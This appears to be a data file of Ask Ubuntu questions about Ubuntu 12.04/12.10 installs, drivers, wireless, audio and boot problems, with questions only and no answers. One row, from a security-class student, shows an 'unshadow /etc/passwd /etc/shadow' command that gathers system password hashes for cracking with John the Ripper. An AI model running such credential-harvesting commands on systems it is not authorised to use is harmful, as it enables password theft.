250665	12.10 blank purple screen on startup dell dimension 3000	i 've installed 12.10 from a purchased disc . setup went ok and i installed any updates . there was some error regarding something called `` compliz '' and i sent the error report . now when i try to start ubuntu i get a blank purple screen and cursor but nothing else happens . i have found and used the `` change quiet splash to nomodeset '' answer but this just ends up leaving me with a blank black screen . i am not very computer savvy so use words i can understand please : - )
250666	my ubuntu keeps freezing	i know there was few similar topics about frozen screen , but in my case i cant even reinstall ubuntu . just keeps freezing . i was trying to run new install from usb stick but when ubuntu screen loaded screen froze again . what should i do ? i 'm thinking to go back to windows and uninstall ubuntu and then install it again , but seems like a waste of time if after fresh install i will have the same problem . at the moment i 'm using dual boot with win7 . all problems started when i tried to connect wireless to my broadband and install updates for ubuntu . i menage to get into terminal and type my login and password from there but few seconds after - screen frozen ! guys , any advice what should i do ? my spec here : cpu 1.0ghz amd c-50 apu operating system ms windows 7 home premium ( 64-bit ) ram 4gb hard drive size 500gb hard drive speed 5,400rpm hard drive type sata hard drive graphics card ati radeon hd 6250 graphics video memory 256mb wi-fi 802.11b/g/n wi-fi model broadcom bluetooth mobile broadband
250669	( solved ) wireless not working after update ( ubuntu 12.10 ) dell inspiron 1764	the wireless has stopped working on my dell inspiron 1764 laptop after updating ubuntu . i installed 12.10 from dvd alongside windows 7 and everything went smoothly . wireless worked fine , and the software centre gave me loads of updates to install - which i did . now when i start my laptop , the wireless does n't connect . i 'm using the broadcom driver and have followed the instructions here : wifi not working after updating 12.10 when i follow the first set of instructions : sudo apt-get update & & sudo apt-get upgrade it says 0 updated 0 installed 0 this 0 that ... basically does n't find anything it needs to do . when i follow the second set of instructions : sudo apt-get install linux linux-headers-generic kernel-package sudo apt-get install -- reinstall bcmwl* firmware-b43-lpphy-installer b43-fwcutter it says e : unable to locate package kernel-package i 'm a bit of a beginner at linux , so i may be missing something . i had it all running on wubi this morning , but now have moved to a proper partitioned installation i seem to be hitting roadblocks . any help much appreciated . edit : ok - got a little bit further - turns out i mis-typed one of the terminal commands . anyway - now it says wireless disabled by hardware switch - i do n't have a hardware switch ! ! ! ! any ideas ? edit 2 : fix it ... i had to go back into windows and enable wireless there ( ? ? ? ) and the switch it on in ubuntu ... weird . i also went into bios and disabled the wifi function button .
250670	how to make byobu start with byobu -u on login/startup ?	how do i make byobu start with unicode support by default ? if i have done byobu-enable how i can set this -u option ?
250678	problem enabling native client ( nacl ) in chromium	in chrome : //flags i 've enabled native client and started chromium with chromium-browser -- enable-nacl i 've installed one of the demo apps , but when i run it it says `` no plug-in available to display this content . '' i 've also tried enabling the portable native client . i 'm running 12.10 64bit .
250679	is it possible to create a desktop shortcut for the sage notebook ?	sage is a python-based mathematics software that integrates a wide range of mathematics software into a single python interface . calling sage from the terminal ( which is how you call it ) creates a cli version of sage ( the program 's default ) from which you can then call the sage notebook by typing , notebook ( ) . the sage notebook is a web browser-based version of sage . i am running i386 12.10 if it helps . when i run sage notebook ( ) from the terminal i receive the error : bash : syntax error near unexpected token ` ( '
250680	why can my system ( dell inspiron n4050 ) not connect to my wifi any more ? ( 12.04 )	i have a dell inspiron n4050 with dual booted windows 7 and ubuntu 12.04 . my wireless driver currently is broadcomm in ubuntu . i am using ubuntu 12.04 . just two days back , after downloading and installing pending updates in my ubuntu 12.04 , i am facing a peculiar problem . i use a belkin n300 router in my home , and after providing the network password , it just goes on and on trying to connect to the network and eventually fails to do so ! however , for the last year i had connected to my home network seamlessly and even now in windows 7 or through my smartphone . however , if i switch on the hotspot in my smartphone , ubuntu connects with it .
250682	how do i get sound back after connecting with x2go without rebooting ?	when i connect remotely over nx using x2go , for some reason , i get a pop-up on the server asking if i want to permanently forget the sound devices that have just been removed : the devices are not being removed , but somehow the connection to the server makes it think that they have been removed . in phonon , these devices are then greyed out i ca n't figure out how to get the sound working again on the server after the client disconnects without rebooting the server . is there any way to restart the sound without rebooting the whole computer ? or refresh the list of hardware devices ? i tried sudo /etc/init.d/pulseaudio restart with no effect .
250685	why is unity-files-daemon accessing my files once per day ?	all my files in my home folder are accessed recursively once per day ( last access timestamp is set ) . with the help of audit , i found that the unity-files-daemon is doing this . can anyone tell me why this is happening and if others are experiencing this also . here is an excerpt from the audit log : type=path msg=audit ( 02.02.2013 19:25:38.039:2250 ) : item=0 name=/home/rosa/dokumente/test inode=2058 dev=08:03 mode=file,664 ouid=rosa ogid=rosa rdev=00:00 type=cwd msg=audit ( 02.02.2013 19:25:38.039:2250 ) : cwd=/ type=syscall msg=audit ( 02.02.2013 19:25:38.039:2250 ) : arch=x86_64 syscall=open success=yes exit=9 a0=2451940 a1=40000 a2=0 a3=0 items=1 ppid=1 pid=6391 auid=rosa uid=rosa gid=rosa euid=rosa suid=rosa fsuid=rosa egid=rosa sgid=rosa fsgid=rosa tty= ( none ) ses=19 comm=unity-files-dae exe=/usr/lib/unity-lens-files/unity-files-daemon key=rosa
250689	accidentally deleted windows partition , how can i do a factory reset with only ubuntu working to restore windows ?	while installing ubuntu , i made a tactical error of my laptop turning off during the partitioning of my hard drive ( manual ) . okay , so in my grub loader i have ubuntu ( 12.04 ) ( works just fine ) , ubuntu recovery , memeory test , windows 7 ( immediatly goes to an error/not found screen ) , and windows 7 recovery . when i go into windows 7 recovery , and click to do a system restore to factory reset , you must restart the system to initiate . but , it just restarts to grub menu . i have an hp pavilion dm4-2015dx my end goal is to do a factory reset , and re-install ubuntu so i can properly dual boot both os 's . i dont have a windows 7 disk laying around , and i dont have any backed up images of my hardrive prior to the accident . any ideas to how i can get windows back on my laptop ?
250690	how to run a script when suspending/resuming ? - sony vaio ubuntu 12.04	question : how to assign a script to run when selecting the suspend option on the power menu ? context : i have a sony vaio laptop , which was a recent purchase . i have managed to install the amd radeon drivers after a few problems , but i would like to be able to disable/enable the discrete graphics card . i have no problem in doing this but it causes problems when suspending & resuming from suspend . when the session is resumed from suspend ( with the discrete dpu disabled ) , the fan will spin up uncontrollably , what i would like to do is edit the suspend script or assign a new script to the suspend option on the power menu . this is so i can re-enable the gpu before suspending . edit : after some research i think it has something to do with the files in /etc/pm/sleep.d/ ? if i put a custom script in there would it be run when suspending and resuming from suspend ? how do i differentiate in the script between suspending/resuming ?
250696	cross-compile for arm ?	how do i set up gcc for cross compiling for the arm processor ? the host would be on x68 ( amd64 - ubuntu 12.04 ) and the target would be arm ( raspberry pi as well as pandaboard - will do separate compilations for each ) ?
250697	how do i switch between pulseaudio and jack on ubuntu 12.04 lts x86 linux ?	there are some applications on my ubuntu 12.04 which requires jack . without jack they just wo n't start , so i have to keep jackd + ( qjackctl ) . now the problem is jackd is not starting properly all the time . sometime it works well , sometime it fails start ( i suspect pulseaudio is the reason ) . now , i have found a workaround to keep both jack and pulseaudio runnning side-by-side here is what i have done 1 . installing pulseaudio-modules-jack 2 . editing /etc/pulse/default.pa and adding these lines # # # load audio drivers statically load-module module-jack-sink load-module module-jack-source after restarting pc i can see both jack and pulseaudio working ok . but here is another problem , the sound output form the speakers are very low , cpu spikes have increased quite a bit , hardware devices are not shown . sound control shows 5:1 sound system where i only have 2:1 sound system . i need a way to switch between pulseaudio and jack . im not a professional music maker . i need jackd only when im using ardour or any other app that needs jack . you must be thinking pulseaudio will be automatically disabled when starting jack . but that is not the case for me . previously i have faced erros trying so here 's a log of that error 14:36:48.194 patchbay deactivated . 14:36:48.198 statistics reset . 14:36:48.228 alsa connection change . 14:36:48.241 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started registered event listener change listener : true 14:36:48.258 alsa connection graph change . 14:37:12.679 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started qspiaccessible : :accessibleevent not handled : `` 2 '' obj : qmessagebox ( 0xbfd7c2d0 ) `` '' fixme : handle dialog start . sat feb 2 14:37:12 2013 : starting jack server ... sat feb 2 14:37:12 2013 : jack server starting in realtime mode with priority 10 sat feb 2 14:37:12 2013 : [ 1m [ 31merror : can not lock down 82241434 byte memory area ( can not allocate memory ) [ 0m sat feb 2 14:37:12 2013 : control device hw:0 sat feb 2 14:37:12 2013 : control device hw:0 sat feb 2 14:37:12 2013 : [ 1m [ 31merror : failed to acquire device name : audio0 error : can not allocate memory [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : audio device hw:0 can not be acquired ... [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : can not initialize driver [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m sat feb 2 14:37:12 2013 : [ 1m [ 31merror : failed to open server [ 0m sat feb 2 14:37:13 2013 : saving settings to `` /home/soham/.config/jack/conf.xml '' ... fixme : handle dialog end . 14:37:17.923 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started qspiaccessible : :accessibleevent not handled : `` 2 '' obj : qmessagebox ( 0xbfd7cb40 ) `` '' fixme : handle dialog start . fixme : handle dialog end . qspiaccessible : :accessibleevent not handled : `` 6 '' obj : qmenu ( 0x8d0f0a0 ) `` '' now my question is how can i switch between pulse and jack safely ? is there any app to do so ? here 's a screenshot -
250702	bios loader on efi system	i have an unusual case . i 'm not trying to partition drives or anything , i have separate physical drives for windows and linux . being a new machine and all , i have uefi . last time i attempted to install ubuntu 12.04 , it worked fine but it destroyed my windows install . changed the format of the drive or something and messed up the mbr . this was 6 months ago , so sorry for the lack of technical insight -- my memory is a bit off . wasted a lot of time reinstalling windows , and i gave up for awhile . now i 'm trying it again ( after 12.10 was a technical disaster , repeated unity crashes and whatnot ) but i currently have my windows drives disconnected so my ubuntu install ca n't mess it up . i figure my future bootloading will involve selecting which drive to boot from , but i 'm worried that grub might take it upon itself to mess around with my windows drives the moment i boot from it . is there any way i can be certain that i wo n't have my windows partitions corrupted again ? last time it took over a day to reinstall everything , this time i suspect it 'll be much longer . on the other hand , i really do n't want to be physically unplugging and replugging drives whenever i want to switch operating systems . selecting drives is weird , but i can at least live with that ...
250703	print jobs held , and after manually releasing them , they return to being held .	everytime i try to print something , its status comes up as `` held . '' when i try to release them , they go to `` processing , '' and then back to `` held . '' after a few times of releasing them , the jobs automatically abort . i 'm using a konica minolta magicolor 1600w , connected via google cloud print . ( using this program to connect : http : //www.niftiestsoftware.com/cups-cloud-print/ )
250704	ubuntu 12.04.1 lts support	i have been trying to install a dual boot win8 & 12.04.1 ubuntu 64 bit on an asus n56v laptop but did no managed to preform the task ( trying different tricks and linux releases ) . i have encountered the notorious grub-install fatal error . i have managed to perform the task by the use of linux mint 14 â nadia ( 64 bit ) , but there is a small problem with the network configuration . ubuntu 12.04 is defined as a long term support release ( aimed at 2017 ) but there are a significant amount of linus users who encountered problems while trying to install a dual boot with win 8/7 . should canonical consider releasing an upgraded ubuntu 12.04 which solves the eufi related issues and newer hardware ? this would allow users to benefit from a stable linux distribution . the other option is to use an sts stable release that can tackle the mentioned problems .
250707	change audio quality for bluetooth speakers	i have logitech bluetooth adapter connected to my hi-fi system . when i connect to the adapter via ubuntu 's default installed bluetooth , and play some music , i get a really low quality sound . it 's not the problem with adapter because when i connect to it from windows on same pc sound quality is really good . i 'm guessing that ubuntu is using some low audio codec or driver is not adequate for playing sound over bluetooth . is there a solution for this kind of a problem ? is there a way to override default bluetooth driver and use something more adequate ?
250719	why can i not connect with wvdial ? ( reliance netconnect + issue with kubuntu )	the wvdial tutorial is very useful for me , unfortunately i am still not able to connect via wvdial but the other hybrid connection method was simply out of the box . i am getting below error while running wvdial sudo apt-get install wvdial reading package lists ... done building dependency tree reading state information ... done wvdial is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . sudo wvdial -- > wvdial : internet dialer version 1.61 -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory -- > can not open /dev/modem : no such file or directory i have run sudo apt-get update first and then run sudo apt-get install wvdial but still no luck ...
250720	is it necessary to reboot after changing group membership ?	i would like to know , why it is required to reboot , to apply the changes , which i made . i refer to the use of adduser username sudo i use ubuntu 12.04.1 lts `` server '' .
250724	will ubuntu phone os be available for the nexus 7 ?	i hear ubuntu desktop is now running on the nexus 7 , although i hear it is n't exactly touch-optimized . will the ubuntu phone interface run on the nexus 7 ? this is not a duplicate of what hardware will the ubuntu mobile os support ? , which pertains to phone hardware . since the nexus 7 is a tablet , the concern is not whether it will run on a particular phone , but whether it will run on a tablet where ubuntu already runs , but which is larger than a phone , and not automatically considered a candidate for a phone os .
250725	would changing to a different motherboard/cpu/ram conflict with ubuntu ?	my buddy has been using hand me down computers for years and is due for a upgrade . he currently has a pre-lga775 pentium 4 @ 2.8ghz and i have a core2duo e6400 @ 2.13ghz with an asus p5lp-le mobo . i would like to just spend the $ 30 on ram and be able to just swap it out in his current computer . what , if anything , would i have to do to ubuntu to play with the new hardware ? he is currently running xubuntu 12.04 . asus p5lp-le mobo core 2 duo e6400
250726	headphone jack only works when partially plugged in	ubuntu 12.04.1 on dell inspiron 17 . in windows the headphone jack works fine . installed 12.04 the first time and the headphone jack worked fine then as well . ran into some issues so had to do a clean reinstall of 12.04 . now the headphones will not put sound through when the plug is all the way into the jack . if i pull it out partially i get sound but i have to get it just right so the sound is cut from the speakers , otherwise the sound goes back and forth between the headphones and the internal speakers when the cord is jiggled . any ideas ? thanks , jeff
250729	what is the best way to uninstall ububtu 13.04 from a pc dual booting 12.04 ?	i installed ubuntu 13.04 on a partition , dual booting with ubuntu 12.04 . now i would like to remove the partition and ubuntu 13.04 without having to lose ubuntu 12.04 or reformatting the entire hard drive . how can i do this ?
250733	can i do a silent or unattended release upgrade ?	how do i upgrade to a new ubuntu version without having to react to prompts ? i 'm on 12.04 now and would like to install 12.10 . when i start the update , it usually downloads stuff , then asks a question , installs a bit , asks a question , etc.. i leave it overnight and sometimes find that it made almost no progress updating . i 'd like to just kick of the process , go away and have it finished after a couple of hours . i 'm fine with it automatically updating configuration files in /etc and so on . so how to start an unattended upgrade ?
250736	how do i access files on my windows partition from ubuntu ?	i 'm new to how ubuntu works and installed it yesterday alongside windows 7 , but in doing so i have created a few problems . i have partitions for windows , ubuntu , system recovery , and storage for all my files with the intention to access them on either os , but i do n't even see all of my drives listed on home folder . not to mention that during the ubuntu instillation i managed to screw up any chance of booting to the windows side of things at all . i 'll fix windows once i get my hands on a copy in a couple days , but in the mean time any suggestions for accessing my files ? if you need me to find any data about my computer to help you figure out what 's wrong with it , please do n't hesitate to tell me what i need to show you . thanks
250738	booting from thumb on windows 8	i 'm using a 4gig usb thumbdrive to create a bootable usb stick on windows to install ubuntu 12.10 . i 've been using this page for step by step instructions , http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows i had no problems with the guide and now have the usb thumb set up , after i set the usb thumb drive as first priority in the boot order i save the settings and windows continues to load even though i selected boot from usb before the hard drive . the thumb drive stays plugged in the entire time , this is my second attempt at trying linux . i first tried installing it from windows but because i have an uefi motherboard it is not compatible . i would have already tried the cd/dvd method but i do not have any , any help would be appreciated .
250743	experimental nvidia drivers , no normal boot ? how to remove nvidia drivers from recovery mode ?	after i installed experimental nvidia drivers , ubuntu will not boot . how can i remove the drivers from recovery mode ? if i choose recovery mode and in the menu choose `` root '' ( drop to root shell prompt ) , and then try to use the command sudo apt-get remove -- purge nvidia-* it says : sudo : unable to open /var/lib/sudo/thakang/console : read-only file system w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . i have used login and logged in so my shell now shows : ~ $ i 'm quite new to this so please let me know if you need some more information ? thank you
250746	fm2-a75ia-e53 wireless not working	i 've just built this mini-itx computer to use ubuntu exclusively and the motherboard `` fm2-a75ia-e53 '' has built in wireless ( with a small connector in the back and a supplied antenna ) . however ubuntu does n't seem to be picking it up at all . at the moment i 'm using a usb wireless adapter but preferably i 'd like to use the built in adapter , does anyone have any ideas as to drivers i could download to try and resolve this ? i 've tried installing madwifi following these instructions but to no avail . any help would be appreciated , thank you .
250749	unable to view message tray in gnome 3.6	i have just installed ubuntu 12.10 on my new laptop and switched to gnome shell session . it seems that the notification tray does n't appear at the bottom of the screen . some details about what works : in the activities overview , the message tray is present and works as expected the new messages appear at the bottom middle of the screen , as they should i can interact with these messages normally , as long as they are displayed so what i am just missing is the big bar with the icons that should appear when i place my mouse at the bottom of the screen . this problem has been there since the install , meaning without any extension . is there something to do to get it work correctly ?
250754	cinnamon on ubuntu high cpu usage	i am using the desktop environment cinnamon on my 12.10 install . everything works great , except that it uses an absurdly high amount of my cpu . my third core is always at +60 % . any ideas ?
250755	no `` single crack '' mode rules found in john.ini	i am a linux noob trying to use john the ripper for a security class . i have john installed to usr/share/john and i have ( i think ) successfully used the unshadow command to unshadow the pw file and then move a copy of the unshadowed file to usr/share/john sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db sudo cp tmp/crack.password.db usr/share/john/crack.password.db but when i try to run john crack.password.db , i get the following error message : myname @ ubuntu : usr/share/john $ sudo john crack.password.db no `` single crack '' mode rules found in john.ini when i open `` john.ini '' in a text editor , it is blank . what does this message mean and how can i fix it ?
250763	copying evolution emails from ubuntu 10.10 to 12.10	i originally had a dual boot configuration of ubuntu 10.10 and windows 7 . suddenly , something happened and i got black screen . i managed to copy my home folder via an ubuntu live cd . i then installed ubuntu 12.10 , installed evolution , and copied the ~/.evolution and ~/.gconf/apps/evolution folders from my backup to my new installation . after that , i started evolution and made the first steps , but i am unable to get my emails back . how do i restore evolution emails from a backup make from ubuntu 10.10 to ubuntu 12.10 ?
250765	ubuntu 12.10 not completing the full install	ubuntu 12.10 does n't complete the full installation from a burned iso dvd disk . it seems to happen sometime after the retrieval of a language pack.i 'm using an old compaq nx9010 laptop . i used the check disk feature with ubuntu before the install , and i checked the hard drive through the laptop bios , and everything checked out ok . i choose the update while installing option as well as without before installing , with the complete erase for both , with password required option , but nothing works .
250767	radeon mobility hd 6620g hdmi sound output not working	output from lspci : 00:00.0 host bridge : advanced micro devices [ amd ] family 12h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati beavercreek [ mobility radeon hd 6620g ] 00:01.1 audio device : advanced micro devices [ amd ] nee ati beavercreek hdmi audio [ radeon hd 6500d and 6400g-6600g series ] 00:04.0 pci bridge : advanced micro devices [ amd ] family 12h processor root port 00:05.0 pci bridge : advanced micro devices [ amd ] family 12h processor root port 00:06.0 pci bridge : advanced micro devices [ amd ] family 12h processor root port 00:10.0 usb controller : advanced micro devices [ amd ] hudson usb xhci controller ( rev 03 ) 00:10.1 usb controller : advanced micro devices [ amd ] hudson usb xhci controller ( rev 03 ) 00:11.0 sata controller : advanced micro devices [ amd ] hudson sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices [ amd ] hudson smbus controller ( rev 13 ) 00:14.1 ide interface : advanced micro devices [ amd ] hudson ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] hudson lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] hudson pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 02:00.0 network controller : ralink corp. rt5390 wireless 802.11n 1t/1r pcie 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) i did a standard install of ubuntu 12.10 64bit . using x.org x server - amd/ati display driver wrapper from xserver-xorg-video-ati ( open source tested ) i get the video image just fine through hdmi to the tv , but the audio fails to come through when i switch the sound to the hdmi hardware . i have tried the `` fglrx-legacy '' fix , but this is an `` ati 6620g '' and that fix is mainly for 4000 series and older , so it came without success . by the way , this was not an issue with ubuntu 12.04 and the catalyst control center
250773	how do i install chromium from the command line ?	i have already tried using the ubuntu software center , but it wo n't install the chromium browser . how can i install it using the terminal ?
250775	how do i turn off the firewall in ubuntu 12.04 ?	how do i turn off the firewall in ubuntu 12.04 ? thanks for the answers . the reason for turning it off was twofold : i often can not make a wireless connectin to internet and get the server is unable to connect message or i get a message that disappears telling me my domain is not compatible with the avahi network whatever that is . so i thought if i disable firewall i would be ok .
250778	canon pixma mg6320 on ubuntu 12.10	i recently got a canon pixma mg6320 printer and i love it , but i ca n't seem to get it to print on ubuntu 12.10 . i went through the standard setup , and it connected fine , until time came to print . i looked online for drivers , but there were none for ubuntu or linux in general . thanks in advance , rain
250780	is the gmail webapp message count broken , or did i just do something wrong ?	for whatever reason , the gmail webapp does n't show a count or a notification that i have new mail . the only time the envelope turns blue is when i 'm already in gmail via firefox . but as soon as i close the browser , even if i have unread mail , the icon turns back to white . no counter either , which is confusing . i 'm a noob when it comes to ubuntu and linux in general , so i would n't know where to begin to try and fix it .
250781	unable to run matlab	i barely managed to get matlab installed but i think it 's installed correctly . however , when i cd to the bin directory and run ./matlab , the matlab logo comes up but then it instantly closes again and i get the error message : license checkout failed . license manager error -2 make sure that the formatting of the license file is correct . when editing the license file use a basic text editor . troubleshoot this issue by visiting : http : //www.mathworks.com/support/lme/r2012b/2 diagnostic information : feature : matlab license path : /home/x/.matlab/r2012b_licenses : /home/x/matlab1/licenses/license.dat : /home/x/matlab1/licenses/network.lic licensing error : -2,413 . system error : 2 ~/matlab1/bin $ ./matlab fatal error on startup : can not locate com/mathworks/jmi/opaquejavainterface class i 've looked at the solution prescribed on the mathworks website but i 'm having a hard time figuring out what to do . i 'm using 64 bit ubuntu 12.10 . thanks .
250782	uploading quickly packages to launchpad	i created an application using quickly and packaged it using the command quickly package . but after i uploaded it to my ppa , i got a message from launchpad saying : rejected : source/binary ( i.e . mixed ) uploads are not allowed . how do i solve this problem ? is there any way to tell quickly not to put binaries in the package ?
250783	what is the design process ( principles or guidlines ) for unity 's ux and gui ?	i recently started to think and develop a new concept of ux and gui for ubuntu ( desktop , television , mobile and tablet ) and i try to start the project on a methodological basis respecting the basic principles of ubuntu . i 've seen many web pages ( ubuntu web site or other sites ) and many videos ( uds and others ) , but i hav n't found anywhere an comprehensive guidelines for the creation of other ux ( and gui ) or even an explanation of the choices made in unity . by `` choice '' i mean why or how ux ( and gui ) are designed : is that based on principles and/or user testing ? to be more clear here is an example from the other : why is unity app launcher on the left side and not at the top or right ? where do i find the answers to such questions ? tanks
250791	how to bind alt+arrows to pageup/pagedown ?	i just tried it using loadkeys and this map file : alt keycode 73 = prior string prior = `` \033 [ 5~ '' alt keycode 81 = next string next = `` \033 [ 6~ '' but it does n't work .
250793	the application compiz has closed unexpectedly	i have installed ubuntu 12.10 on my desktop . ( pentium 4 , 80 gb hard disk , 2 gb ram , 32-bit cpu . ) and i have installed windows xp . i made a 40 gb partition for windows and 40 gb for ubuntu . i installed ubuntu and it said `` installation is complete '' and asked me to restart . i restarted the pc and logged in . after 1 minute i get a message like this : the application compiz has closed unexpectedly . then i closed it . after that it just stays in blank screen nothing shows up . what should i do ?
250794	using and installing rubyonrails	i need help here . i am new to programming and interested in learning rubyonrails . i installed the above mentioned software on ubuntu 12.10 using i found on ubuntu community page . after installation , i tried to run the command rake db : migrate , and i got the following errors please help . luke @ luke-pc : ~/www/railsapp $ rake db : migrate note : gem.source_index is deprecated , use specification . it will be removed on or after 2011-11-01 . gem.source_index called from /home/luke/www/railsapp/vendor/rails/railties/lib/rails/gem_dependency.rb:21 . note : gem : :sourceindex # initialize is deprecated with no replacement . it will be removed on or after 2011-11-01 . gem : :sourceindex # initialize called from /home/luke/www/railsapp/vendor/rails/railties/lib/rails/vendor_gem_source_index.rb:100 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/local/lib/site_ruby/1.9.1/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/local/lib/site_ruby/1.9.1/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/local/lib/site_ruby/1.9.1/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/local/lib/site_ruby/1.9.1/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/local/lib/site_ruby/1.9.1/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/local/lib/site_ruby/1.9.1/rubygems/source_index.rb:91. rake aborted ! error : 'rake/rdoctask ' is obsolete and no longer supported . use 'rdoc/task ' ( available in rdoc 2.4.2+ ) instead . /home/luke/www/railsapp/rakefile:8 : in ` < top ( required ) > ' ( see full trace by running task with -- trace )
250804	how do install panda 3d on precise or quantal ?	i want to install panda 3d ( browser plugin ) on 12.10 or 12.04 ( 32-bit ) . i have tried several things and tried to compile from source . any source/compiled/ppa would be appreciated . i keep running into 'pandas ' on the web , is this related ? it does n't seem to be .
250806	alternate installing ubuntu 12.04 on new vaio svz ( raid0 )	i am attempting to install ubuntu 12.04 lts 64-bit on my brand new vaio svz laptop . i am using alternate installer , since the machine has a raid0 ssd ( fake raid ? ) . after activating ata raid , partition disks step show correct windows 7 partitions , and some free space i have produced in windows 7 partition tool for linux , as follows : serial ata raid isw_cagi ... .volume0 ( stripe ) - 512 gb linux device-mapper ( strip # 1 primary 22.1 gb ntfs # 2 primary 367.0 mb b ntfs # 3 primary 355.2 gb ntfs logical 125.8 gb free space # 5 logical 8.6 gb i then create /boot , / and swap space , resulting in : # 1 primary 22.1 gb ntfs # 2 primary 367.0 mb b ntfs # 3 primary 355.2 gb ntfs # 6 logical 499.9 mb f ext4 /boot # 7 logical 121.0 gb f ext4 / # 8 logical 4.2 gb f swap swap logical 325.2 mb free space # 5 logical 8.6 gb after that , installer goes into `` installing the base system '' , `` configure the package manager '' , without problems . when it gets to `` select and install software '' , it reports `` installation step failed '' . even though there is the option of skipping it , i am not sure this is a good idea . btw , i was intending on directing installation of grub boot loader on a separate partition , but do n't want to proceed skipping the failed step . interesting thing is that after i abort , and come back again to re-try installation , the partition tool sees : # 1 primary 22.1 gb ntfs # 2 primary 367.0 mb b ntfs # 3 primary 355.2 gb ntfs # 6 logical 499.9 mb f ext4 ( use as : do not use ; no mounting point ) # 7 logical 121.0 gb f ext4 ( use as : do not use ; no mounting point ) # 8 logical 4.2 gb f swap swap ( use as : swap area ) logical 325.2 mb free space # 5 logical 8.6 gb that is , /boot and / root partition are marked as `` do not use '' ; only swap partition remains as it was created . can somebody help me getting through the installation process ?
250807	kubuntu installation asks to install on entire partition	i 'm trying to install kubuntu 12.10 on my computer , but when i get to the part where we chose the partition to install kubuntu , i only have three options and all of them includes using the 100 % of my hdd . since i did't want to have any problems with my other partitions , i canceled the installation . here 's the picture of the screen i mentioned i 'm actually not sure about what it 's going to do because i do n't have enough knowledge of technical english even though i 'm an elt student . the second bar on the image really bugged me and i thought i better seek for help . any kind of help would be appreciated by the way . thank you for your help in advance and have a nice day .
250808	ubuntu12.10 boots up and hangs	i am using ubuntu 12.10 with gnome 3.6 . it was working fine . but now after i installed some updates of gnome , i am unable to successfully login into ubuntu . the ubuntu boots up normally and after loading the wallpaper it hangs up . nothing else is shown in the desktop . alt+f2 does n't work . ctrl+alt+f2 is working . how can i resolve this problem ? is it possible to login into unity desktop , if gnome has caused this problem ? thanks .
250811	i have downloaded ubuntu 12.10 but details tell i am using ubuntu 13.04	i have downloaded ubuntu 12.10 but details tell i am using ubuntu 13.04 . how is this possible ?
250812	how to activate flash player for a quickly created webview/webkit app	i created a web browser program using webview/webkit as the web displayer . i noticed that when i went to youtube only a few videos worked . i am pretty sure that i have to tell webview to activate flash player but i do n't know how to do this . i heard somewhere that it might need to import resources from another browser in order to play flash videos . i do n't know if that is true but i would preferably have the flash work without help from any other browser but if it needs to have firefox installed to play flash then thatâs okay too . i am using quickly which uses glade as the interface designer and python as the code . thanks in advance .
